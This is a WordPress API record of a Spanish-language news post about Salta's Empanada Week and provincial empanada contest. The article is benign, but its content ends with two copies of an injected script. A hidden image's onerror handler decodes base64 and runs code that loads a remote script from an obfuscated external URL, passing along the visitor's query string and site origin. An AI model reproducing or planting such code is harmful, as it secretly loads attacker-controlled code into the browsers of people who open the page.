{"id":4971,"date":"2025-03-25T08:54:02","date_gmt":"2025-03-25T11:54:02","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=4971"},"modified":"2025-08-13T23:38:17","modified_gmt":"2025-08-14T02:38:17","slug":"salta-presento-en-buenos-aires-la-semana-de-la-empanada-y-el-4o-concurso-provincial","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=4971","title":{"rendered":"Salta present\u00f3 en Buenos Aires la Semana de la Empanada y el 4\u00ba Concurso Provincial"},"content":{"rendered":"\n<p><strong><em>Del 31 de marzo al 6 de abril, Salta vivir\u00e1 una semana llena de sabor y tradici\u00f3n con la Semana de la Empanada, una iniciativa que busca promover la identidad culinaria local y fortalecer el turismo gastron\u00f3mico. La presentaci\u00f3n oficial de este evento y del 4\u00ba Concurso Provincial de la Empanada se realiz\u00f3 en Casa de Salta en Buenos Aires<\/em><\/strong><\/p>\n\n\n\n<p>En un evento realizado en la Casa de Salta en Buenos Aires, se present\u00f3 oficialmente la Semana de la Empanada y el 4\u00ba Concurso Provincial de la Empanada. La presentaci\u00f3n estuvo a cargo de la&nbsp;<strong>secretar\u00eda de Turismo de Salta, Nadia Loza,&nbsp;<\/strong>y cont\u00f3 con la presencia de autoridades del sector gastron\u00f3mico y medios de prensa.<\/p>\n\n\n\n<p>Durante el encuentro, Loza destac\u00f3 la importancia de la empanada salte\u00f1a como un emblema de la identidad local y su impacto positivo en la econom\u00eda regional. \u00abLa empanada no es solo un plato t\u00edpico, sino una fuente de trabajo y una oportunidad de emprendimiento para muchas familias salte\u00f1as. Con este tipo de iniciativas, buscamos potenciar el turismo gastron\u00f3mico y seguir posicionando a Salta como un destino de sabores y tradiciones\u00bb, afirm\u00f3 la funcionaria.<\/p>\n\n\n\n<p>El Concurso Provincial de la Empanada, que se realizar\u00e1 el pr\u00f3ximo viernes 4 de abril en Salta,&nbsp; ha cobrado gran relevancia a lo largo de los a\u00f1os, con la participaci\u00f3n de m\u00e1s de 40 municipios y m\u00e1s de 1.300 concursantes en ediciones anteriores. Este a\u00f1o, se suma la Semana de la Empanada, con el apoyo del sector gastron\u00f3mico, que ofrecer\u00e1 del 31 de marzo al 6 de abril, descuentos y experiencias culinarias en establecimientos de la provincia que incluir\u00e1n promociones como la \u00abdocena de 15 empanadas\u00bb, men\u00fas especiales, degustaciones, combos y regalos.<\/p>\n\n\n\n<p>Durante &nbsp;esta semana, salte\u00f1os y visitantes tambi\u00e9n podr\u00e1n participar de distintos cursos y talleres, entre ellos una MasterClass de la empanada,&nbsp;maridaje con vino, empanadas de autor, y presentaciones en vivo. Est\u00e1s actividades incentivar\u00e1n&nbsp;la innovaci\u00f3n en la cocina con propuestas creativas de chefs y cocineros locales.<\/p>\n\n\n\n<p>En la presentaci\u00f3n tambi\u00e9n estuvieron presentes el presidente de la C\u00e1mara Hotelera, Gastron\u00f3mica y Afines de Salta, Juan Chib\u00e1n, y el presidente de la Federaci\u00f3n Empresaria Hotelera Gastron\u00f3mica de la Rep\u00fablica Argentina (FEHGRA), Fernando Desbots, quienes reafirmaron el compromiso del sector privado en la promoci\u00f3n de la gastronom\u00eda salte\u00f1a.<\/p>\n\n\n\n<p>Para conocer m\u00e1s detalles y actividades de la Semana de la Empanada y el Concurso Provincial, se puede ingresar en&nbsp;<a href=\"http:\/\/www.rutaempanadasalta.ar.\/\">http:\/\/www.rutaempanadasalta.ar.<\/a><\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:&nbsp;<strong>Secretaria de Prensa y Comunicaci\u00f3n<\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Del 31 de marzo al 6 de abril, Salta vivir\u00e1 una semana llena de sabor y tradici\u00f3n con la Semana de la Empanada, una iniciativa que busca promover la identidad culinaria local y fortalecer el turismo gastron\u00f3mico. La presentaci\u00f3n oficial de este evento y del 4\u00ba Concurso Provincial de la Empanada se realiz\u00f3 en Casa [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":4972,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[3,15],"tags":[],"class_list":{"0":"post-4971","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-gourmet","8":"category-provincial"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4971"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=4971"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4971\/revisions"}],"predecessor-version":[{"id":6543,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4971\/revisions\/6543"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/4972"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=4971"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=4971"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=4971"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}